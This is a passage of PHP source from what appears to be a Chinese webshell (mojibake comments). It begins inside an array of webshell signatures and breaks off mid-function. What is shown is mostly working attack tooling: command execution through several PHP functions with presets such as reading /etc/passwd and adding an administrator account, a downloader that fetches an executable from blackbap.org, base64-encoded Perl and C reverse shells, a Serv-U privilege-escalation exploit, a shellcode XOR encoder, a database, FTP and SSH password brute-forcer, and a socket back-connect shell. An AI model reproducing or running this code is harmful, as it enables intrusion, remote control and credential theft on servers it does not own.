array('ű'=>'VBScript.Encode',''=>'#@~^','fso'=>'fso.createtextfile(path,true)','excuteһ仰'=>'execute','evalһ仰'=>'eval','wscript'=>'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B','ݿ'=>'13709620-C279-11CE-A49E-444553540000','wscript'=>'WScript.Shell','fso'=>'0D43FE01-F093-11CF-8940-00A0C9054228','ʮ'=>'','aspx'=>'Process.GetProcesses','aspxһ仰'=>'Request.BinaryRead'); +print<< +
          ɨ·
          +
          ľ phpľ +asp+aspxľ
          +
          ɨӦڸļ,ļкļ +
          ɨӦڸļ
          +
          + +END; +if(!empty($_POST['sp'])) +{ + echo '
          '; + if(isset($_POST['stphp'])){$features_all = $features_php; $st = '\.php|\.inc|\;';} + if(isset($_POST['stasx'])){$features_all = $features_asx; $st = '\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} + if(isset($_POST['stphp']) && isset($_POST['stasx'])){$features_all = array_merge($features_php,$features_asx); $st = '\.php|\.inc|\.asp|\.asa|\.cer|\.aspx|\.ascx|\;';} + $sb = ($_POST['sb'] == 'a') ? true : false; + echo Antivirus_Auto($_POST['sp'],$features_all,$st,$sb) ? 'ɨ' : '쳣ֹ'; + echo '
          '; +} +return true; +} +//ļ +function Findfile_Auto($sfp,$sfc,$sft,$sff,$sfb) +{ + //echo $sfp.'
          '.$sfc.'
          '.$sft.'
          '.$sff.'
          '.$sfb; + if(($h_d = @opendir($sfp)) == NULL) return false; + while(false !== ($Filename = @readdir($h_d))) + { + if($Filename == '.' || $Filename == '..') continue; + if(eregi($sft,$Filename)) continue; + $Filepath = File_Str($sfp.'/'.$Filename); + if(is_dir($Filepath) && $sfb) Findfile_Auto($Filepath,$sfc,$sft,$sff,$sfb); + if($sff) + { + if(stristr($Filename,$sfc)) + { + echo ' '.$Filepath.'
          '."\r\n"; + ob_flush(); + flush(); + } + } + else + { + $File_code = File_Read($Filepath); + if(stristr($File_code,$sfc)) + { + echo ' '.$Filepath.'
          '."\r\n"; + ob_flush(); + flush(); + } + } + } + @closedir($h_d); + return true; +} +function Findfile_j() +{ + if(!empty($_GET['df'])){echo $_GET['df'];if(@unlink($_GET['df'])){echo 'ɾɹ';}else{@chmod($_GET['df'],0666);echo @unlink($_GET['df']) ? 'ɾɹ' : 'ɾʧ';} return false;} + if((!empty($_GET['fp'])) && (!empty($_GET['fn'])) && (!empty($_GET['dim']))) { File_Edit($_GET['fp'],$_GET['fn'],$_GET['dim']); return false; } + $SCAN_DIR = isset($_POST['sfp']) ? $_POST['sfp'] : File_Mode(); + $SCAN_CODE = isset($_POST['sfc']) ? $_POST['sfc'] : 'config'; + $SCAN_TYPE = isset($_POST['sft']) ? $_POST['sft'] : '.mp3|.mp4|.avi|.swf|.jpg|.gif|.png|.bmp|.gho|.rar|.exe|.zip'; +print<< +
          ɨ·
          +
          ļ
          +
          ؼִ +ļ +
          +
          Ӧڸļ,ļкļ +
          Ӧڸļ
          +
          + +END; + if((!empty($_POST['sfp'])) && (!empty($_POST['sfc']))) + { + echo '
          '; + $_POST['sft'] = str_replace('.','\\.',$_POST['sft']); + $sff = ($_POST['sff'] == 'a') ? true : false; + $sfb = ($_POST['sfb'] == 'a') ? true : false; + echo Findfile_Auto($_POST['sfp'],$_POST['sfc'],$_POST['sft'],$sff,$sfb) ? '' : '쳣ֹ'; + echo '
          '; + } + return true; +} +//ϵͳϢ +function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}} +function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";} +function Info_f() +{ + $dis_func = get_cfg_var("disable_functions"); + $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "ϴ"; + $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; + if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
          ",$dis_func);$dis_func = str_replace(",","
          ",$dis_func);} + $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; + $info = array( + array("ʱ",date("Ymd h:i:s",time())), + array("","".$_SERVER['SERVER_NAME'].""), + array("IPַ",gethostbyname($_SERVER['SERVER_NAME'])), + array("ϵͳ",PHP_OS), + array("ϵͳֱ",$_SERVER['HTTP_ACCEPT_LANGUAGE']), + array("",$_SERVER['SERVER_SOFTWARE']), + array("IP",getenv('REMOTE_ADDR')), + array("Web˿",$_SERVER['SERVER_PORT']), + array("PHPзʽ",strtoupper(php_sapi_name())), + array("PHP汾",PHP_VERSION), + array("ڰȫģʽ",Info_Cfg("safemode")), + array("Ա",$adminmail), + array("ļ·",__FILE__), + array("ʹ URL ļ allow_url_fopen",Info_Cfg("allow_url_fopen")), + array("̬ӿ enable_dl",Info_Cfg("enable_dl")), + array("ʾϢ display_errors",Info_Cfg("display_errors")), + array("Զȫֱ register_globals",Info_Cfg("register_globals")), + array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), + array("ʹڴ memory_limit",Info_Cfg("memory_limit")), + array("POSTֽ post_max_size",Info_Cfg("post_max_size")), + array("ϴļ upload_max_filesize",$upsize), + array("ʱ max_execution_time",Info_Cfg("max_execution_time").""), + array("õĺ disable_functions",$dis_func), + array("phpinfo()",$phpinfo), + array("Ŀǰпռdiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), + array("ͼδ GD Library",Info_Fun("imageline")), + array("IMAPʼϵͳ",Info_Fun("imap_close")), + array("MySQLݿ",Info_Fun("mysql_close")), + array("SyBaseݿ",Info_Fun("sybase_close")), + array("Oracleݿ",Info_Fun("ora_close")), + array("Oracle 8 ݿ",Info_Fun("OCILogOff")), + array("PREL﷨ PCRE",Info_Fun("preg_match")), + array("PDFĵ֧",Info_Fun("pdf_close")), + array("Postgre SQLݿ",Info_Fun("pg_close")), + array("SNMPЭ",Info_Fun("snmpget")), + array("ѹļ֧(Zlib)",Info_Fun("gzclose")), + array("XML",Info_Fun("xml_set_object")), + array("FTP",Info_Fun("ftp_login")), + array("ODBCݿ",Info_Fun("odbc_close")), + array("Session֧",Info_Fun("session_start")), + array("Socket֧",Info_Fun("fsockopen")), + ); + echo '
          ϼĿ¼ ޸ʱ С
          0 '.$Filename.' ɾ '; + echo ' '.$Fileperm.' '.$Filetime.'
          '.$fname.' '; + echo ' '.$Fileperm.''.$Filetime.' '.$Filesize.'
          '; + for($i = 0;$i < count($info);$i++){echo ''."\n";} + echo '
          '.$info[$i][0].''.$info[$i][1].'
          '; + return true; +} +//ִ +function Exec_Run($cmd) +{ + $res = ''; + if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);} + elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);} + elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();} + elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();} + elseif(@is_resource($f = @popen($cmd,"r"))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);} + return $res; +} +function Exec_g() +{ + $res = ''; + $cmd = 'dir'; + if(!empty($_POST['cmd'])){$res = Exec_Run($_POST['cmd']);$cmd = $_POST['cmd'];} +print<< +function sFull(i){ + Str = new Array(14); + Str[0] = "dir"; + Str[1] = "ls /etc"; + Str[2] = "cat /etc/passwd"; + Str[3] = "cp -a /home/www/html/a.php /home/www2/"; + Str[4] = "uname -a"; + Str[5] = "gcc -o /tmp/silic /tmp/silic.c"; + Str[6] = "net user silic silic /add & net localgroup administrators silic /add"; + Str[7] = "net user"; + Str[8] = "netstat -an"; + Str[9] = "ipconfig"; + Str[10] = "copy c:\\1.php d:\\2.php"; + Str[11] = "tftp -i 123.234.222.1 get silic.exe c:\\silic.exe"; + Str[12] = "lsb_release -a"; + Str[13] = "chmod 777 /tmp/silic.c"; +document.getElementById('cmd').value = Str[i]; +return true; +} + +
          + + +
          +
          +END; +return true; +} +//ӿ +function Com_h() +{ +$object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; +print<<[ADODB.Connection] +[WScript.shell] +[Shell.Application] +[Downloader]
          +
          +END; +if($object == 'downloader') +{ + $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe'; + $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__).'/a.exe'); +print<< +
          ص
          +
          +END; + if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) + { + echo '
          '; + $contents = @file_get_contents($_POST['durl']); + if(!$contents) echo '޷'; + else echo File_Write($_POST['dpath'],$contents,'wb') ? 'سɹ' : 'ʧ'; + echo '
          '; + } +} +elseif($object == 'wscript') +{ + $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; +print<<ִCMD +
          +END; + if(!empty($_POST['cmd'])) + { + echo '
          '; + $shell = new COM('wscript'); + $exe = @$shell->exec("cmd.exe /c ".$cmd); + $out = $exe->StdOut(); + $output = $out->ReadAll(); + echo '
          '.$output.'
          '; + @$shell->Release(); + $shell = NULL; + echo '
          '; + } +} +elseif($object == 'application') +{ + $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; + $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\boot.ini d:\a.txt'; +print<<· +
          +
          +END; + if(!empty($_POST['run'])) + { + echo '
          '; + $shell = new COM('application'); + echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? 'ִгɹ' : 'ִʧ'; + @$shell->Release(); + $shell = NULL; + echo '
          '; + } +} +elseif($object == 'adodb') +{ + $string = isset($_POST['string']) ? $_POST['string'] : ''; + $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; +print<< +function hFull(i){ + if(i==0 || i==5) return false; + Str = new Array(12); + Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb"; + Str[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**"; + Str[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**"; + Str[4] = "Provider=MSDAORA.1;Password=;User ID=ʺ;Data Source=;Persist Security Info=True;"; + Str[6] = "SELECT * FROM [TableName] WHERE ID<10"; + Str[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')"; + Str[8] = "DELETE FROM [TableName] WHERE ID=1"; + Str[9] = "UPDATE [TableName] SET USER='yoco' WHERE ID=1"; + Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; + Str[11] = "DROP TABLE [TableName]"; + Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; + Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS"; + if(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} + return true; +} + +
          ַ +
          +
          SQL
          +
          + +END; + if(!empty($string)) + { + echo '
          '; + $shell = new COM('adodb'); + @$shell->Open($string); + $result = @$shell->Execute($sql); + $count = $result->Fields->Count(); + for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);} + echo $result ? $sql.' ִгɹ
          ' : $sql.' ִʧ
          '; + if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).'
          ';}@$result->MoveNext();}} + $shell->Close(); + @$shell->Release(); + $shell = NULL; + echo '
          '; + } +} + return true; +} + +//ɨ˿ +function Port_i() +{ + $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; + $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|22|23|25|80|110|135|139|445|1433|3306|3389|8000|43958'; +print<< +
          ɨIP
          +
          ˿ں
          +
          + +END; + if((!empty($_POST['ip'])) && (!empty($_POST['port']))) + { + echo '
          '; + $ports = explode('|', $_POST['port']); + for($i = 0;$i < count($ports);$i++) + { + $fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,2); + echo $fp ? 'Ŷ˿ ---> '.$ports[$i].'
          ' : 'رն˿ ---> '.$ports[$i].'
          '; + ob_flush(); + flush(); + } + echo '
          '; + } + return true; +} + +//LinuxȨ +function Linux_k() +{ + $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); + $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; +print<< +
          ĵַ
          +
          Ӷ˿
          +
          ִзʽ
          +
          +END; + if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) + { + echo '
          '; + if($_POST['use'] == 'perl') + { + $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + echo File_Write('/tmp/yoco_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/yoco_bcɹ
          ' : '/tmp/yoco_bcʧ
          '; + $perlpath = Exec_Run('which perl'); + $perlpath = $perlpath ? chop($perlpath) : 'perl'; + echo Exec_Run($perlpath.' /tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִʧ'; + } + if($_POST['use'] == 'c') + { + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + echo File_Write('/tmp/yoco_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/yoco_bc.cɹ
          ' : '/tmp/yoco_bc.cʧ
          '; + $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/yoco.c'); + echo Exec_Run('/tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִʧ'; + } + echo '
          ԳӶ˿ (nc -l -n -v -p '.$_POST['yourport'].')
          '; + } + return true; +} + +//ServU +function Servu_l() +{ + $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; +print<<[ִ] [û] +
          +
          ServU˿
          +
          ServUû
          +
          ServU
          +END; +if($_GET['o'] == 'adduser') +{ +print<<ʺ + +Ŀ¼ +END; +} +else +{ +print<<Ȩ
          + + + +END; +} +echo '
          '; + if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) + { + echo '
          '; + $sendbuf = ""; + $recvbuf = ""; + $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; + $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". + "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". + "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; + $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; + $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "SITE MAINTENANCE\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = $domain; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = $adduser; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + if(!empty($_POST['SUCommand'])) + { + $exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "USER ".$_POST['user']."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "PASS ".$_POST['password']."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "ݰ: site exec ".$_POST["SUCommand"]."
          "; + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = $deldomain; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + @fclose($exp); + } + @fclose($sock); + echo '
          '; + } +} + +//FTP +function filecollect($dir,$filelist) { + $files = ftp_nlist($conn,$dir); + return $files; + } +function ftp_php(){ +$dir = ""; +$ftphost = isset($_POST['ftphost']) ? $_POST['ftphost'] : '127.0.0.1'; +$ftpuser = isset($_POST['ftpuser']) ? $_POST['ftpuser'] : 'root'; +$ftppass = isset($_POST['ftppass']) ? $_POST['ftppass'] : 'silic123456'; +$ftplist = isset($_POST['list']) ? $_POST['list'] : ''; +$ftpfolder = isset($_POST['ftpfolder']) ? $_POST['ftpfolder'] : '/'; +$ftpfolder = strtr($ftpfolder,"\\","/"); +$files = isset($_POST['readfile']) ? $_POST['readfile'] : ''; +print<<
          phpftpӲ(δ)
          +
          +
          : +¼: +:

          + +·: + +

          +END; +if($ftplist == 'list'){ +$conn = @ftp_connect($ftphost) or die("޷"); + if(@ftp_login($conn,$ftpuser,$ftppass)){ + $filelists = @ftp_nlist( $conn, $ftpfolder ); + echo "
          ";
          +    echo "ǰļ:$ftpfolder:
          "; + if(is_array($filelists)) + { + foreach ($filelists as $file) + { + $file = strtr($file,"\\","/"); + $size_file =@ftp_size($conn, $file); + if ( $size_file == -1) + { + $a=$a.basename($file)."
          "; + } + else + { + $b=$b.basename($file)." ".$size_file."B
          "; + } + } + } + echo $a; + echo $b; + echo "
          "; + } + } +print<< +
          ļ: + +

          +END; +$readaction = isset($_POST['read']) ? $_POST['read'] : ''; +if ($readaction == 'read') { + $handle = @file_get_contents("ftp://$ftpuser:$ftppass@$ftphost/$files", "r"); + $handle = htmlspecialchars($handle); + $handle = str_replace("\n", "
          ", $handle); + echo "$files:

          "; + echo $handle; + } +print<< +
          ļ: + + +
          +END; +$upaction = isset($_POST['upfile']) ? $_POST['upfile'] : '' ; +if ($upaction == 'upfile') { + $cdir = isset($_POST['cdir']) ? $_POST['cdir'] : '/'; + $conn = @ftp_connect($ftphost) or die("޷"); + if(@ftp_login($conn,$ftpuser,$ftppass)){ + @ftp_chdir($conn, $cdir); + $res_code = @ftp_put($conn,$_FILES['upload']['name'],$_FILES['upload']['tmp_name'], FTP_BINARY,0); + if (empty($res_code)){ + echo 'ϴʧ
          '; + } + else{ + echo 'ϴɹ
          '; + } + } +} +print<< +
          ·: + +
          +END; +$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; +$getaction = isset($_POST['getfile']) ? $_POST['getfile'] : ''; +if ($getaction == 'down' && $getfile !=''){ +function php_ftp_download($filename){ +global $ftphost,$ftpuser,$ftppass; + $ftp_path = dirname($filename) . "/"; + $select_file = basename($filename); + $ftp = @ftp_connect($ftphost); + if($ftp){ + if(@ftp_login($ftp, $ftpuser, $ftppass)){ + if(@ftp_chdir($ftp,$ftp_path)) { + $tmpfile = tempnam(getcwd(),"temp"); + if(ftp_get($ftp,$tmpfile,$select_file,FTP_BINARY)){ + ftp_quit($ftp); + header("Content-Type:application/octet-stream"); + header("Content-Disposition:attachment; filename=" . $select_file); + unlink($tmpfile); + exit; + } + } + } + } + ftp_quit($ftp); + } +php_ftp_download($getfile); +} +} + +//shellcodeת +function shellcode_decode($Url_String,$Oday_value) +{ + $Oday_value = hexdec($Oday_value); + $$Url_String = str_replace(" ", "", $Url_String); + $SHELL = explode("%u", $Url_String); + for($i=0;$i < count($SHELL);$i++) + { + $Temp = $SHELL[$i]; + $s_1 = substr($Temp,2); + $s_2 = substr($Temp,0,2); + $COPY .= $s_1.$s_2; + } +for($n=0; $n < strlen($COPY); $n+=2){$Decode .= pack("C", hexdec(substr($COPY, $n, 2) )^ $Oday_value);} +return $Decode; +} +function shellcode_encode($Url_String,$Oday_value) +{ + $Length =strlen($Url_String); + $Todec = hexdec($Oday_value); + for ($i=0; $i < $Length; $i++) + { + $Temp = ord($Url_String[$i]); + $Hex_Temp = dechex($Temp ^ $Todec); + if (hexdec($Hex_Temp) < 16) $Hex_Temp = '0'.$Hex_Temp; + $hex .= $Hex_Temp; + } +if ($Length%2) $hex .= $Oday_value.$Oday_value; else $hex .= $Oday_value.$Oday_value.$Oday_value.$Oday_value; +for ($n=0; $n < strlen($hex); $n+=4) +{ + $Temp = substr($hex, $n, 4); + $s_1= substr($Temp,2); + $s_2= substr($Temp,0,2); + $Encode.= '%u'.$s_1.$s_2; +} +return $Encode; +} +function shellcode_findxor($Url_String) +{ + for ($i = 0; $i < 256; $i++) + { + $shellcode[0] = shellcode_decode($Url_String, dechex($i)); + if ((strpos ($shellcode[0],'tp:')) || (strpos ($shellcode[0],'url')) || (strpos ($shellcode[0],'exe'))) + { + $shellcode[1] = dechex($i); + return $shellcode; + } + } +} +function Shellcode_j() +{ + $Oday_value='0'; + $Shell_Code='http://blackbap.org/hello.exe'; + $checkeda='checked'; + $checkedb=''; +if(!empty($_POST['code'])) +{ + if($_POST['xor'] == 'a' && isset($_POST['number'])){$Oday_value = $_POST['number'];$Shell_Code = shellcode_encode($_POST['code'],$Oday_value);} + if($_POST['xor'] == 'b'){$checkeda = '';$checkedb = ' checked';$Shell_Code_Array = shellcode_findxor($_POST['code']);$Shell_Code = $Shell_Code_Array[0];$Oday_value = $Shell_Code_Array[1];} + if(!$Oday_value) $Oday_value = '0'; + if(!$Shell_Code) $Shell_Code = 'Ҳshellcodeurl'; + $Shell_Code = htmlspecialchars($Shell_Code); +} +print<< +
          XOR(ڵ): +XORת XORת
          +
          +
          + +END; +return true; +} + +//ɨ +function Crack_k() +{ + $MSG_BOX = 'ȴϢ......'; + $ROOT_DIR = File_Mode(); + $SORTS = explode('/',$ROOT_DIR); + array_shift($SORTS); + $PASS = join(',',$SORTS); +//ϵͳļ룬forһ鴿ظ by:yoco +for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';} +if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass']))) +{ + $SORTPASS = explode(',',$_POST['pass']); + $connect = false; + $MSG_BOX = 'not found'; + for($k = 0;$k < count($SORTPASS);$k++) + { + if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); + if($_POST['class'] == 'mssql') $connect = @mssql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); + if($_POST['class'] == 'pgsql') $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop($SORTPASS[$k])}"); + if($_POST['class'] == 'oracle') $connect = @oci_connect($_POST['user'],chop($SORTPASS[$k]),$_POST['address']); + if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));} + if($_POST['class'] == 'ssh'){$ssh_conn = @ssh2_connect($_POST['address'],'22');$connect = @ssh2_auth_password($ssh_conn,$_POST['user'],chop($SORTPASS[$k]));} + if($connect) $MSG_BOX = '[project: '.$_POST['class'].'] [ip: '.$_POST['address'].'] [user: '.$_POST['user'].'] [pass: '.$SORTPASS[$k].']'; + } +} +print<< +
          {$MSG_BOX}
          +
          +
          ˻
          +

          +
          ʽMysql mssql Pgsql Oracle FTP SSH
          +
          +END; +return true; +} + + +//php socketWindows +function phpsocket() +{ + @set_time_limit(0); + $system=strtoupper(substr(PHP_OS, 0, 3)); +if(!extension_loaded('sockets')) +{ + if ($system == 'WIN') { + @dl('php_sockets.dll') or die("Can't load socket"); + }else{ + @dl('sockets.so') or die("Can't load socket"); + } +} +if(isset($_POST['host']) && isset($_POST['port'])) +{ + $host = $_POST['host']; + $port = $_POST['port']; +}else{ +print<<
          php socketִcmdshellӣΪWinϵͳ
          php_socketsΪopen
          ͨphpinfo()鿴Ƿ
          ҪäĿӣɷԴľغ
          +
          +
          Host:
          ˿:

          +Linux Windows + +eof; +} +if($system=="WIN") +{ + $env=array('path' => 'c:\\windows\\system32'); +}else{ + $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); +} +$descriptorspec = array( + 0 => array("pipe","r"), + 1 => array("pipe","w"), + 2 => array("pipe","w"), +); +$host=gethostbyname($host); +$proto=getprotobyname("tcp"); +if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0) +{ +die("Socketʧ"); +} +if(($ret=socket_connect($sock,$host,$port))<0) +{ +die("ʧ"); +}else{ +$message="----------------------PHP--------------------\n"; +socket_write($sock,$message,strlen($message)); +$cwd=str_replace('\\','/',dirname(__FILE__)); +while($cmd=socket_read($sock,65535,$proto)) +{ +if(trim(strtolower($cmd))=="exit") +{ +socket_write($sock,"Bye\n"); +exit; +}else{ +$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, 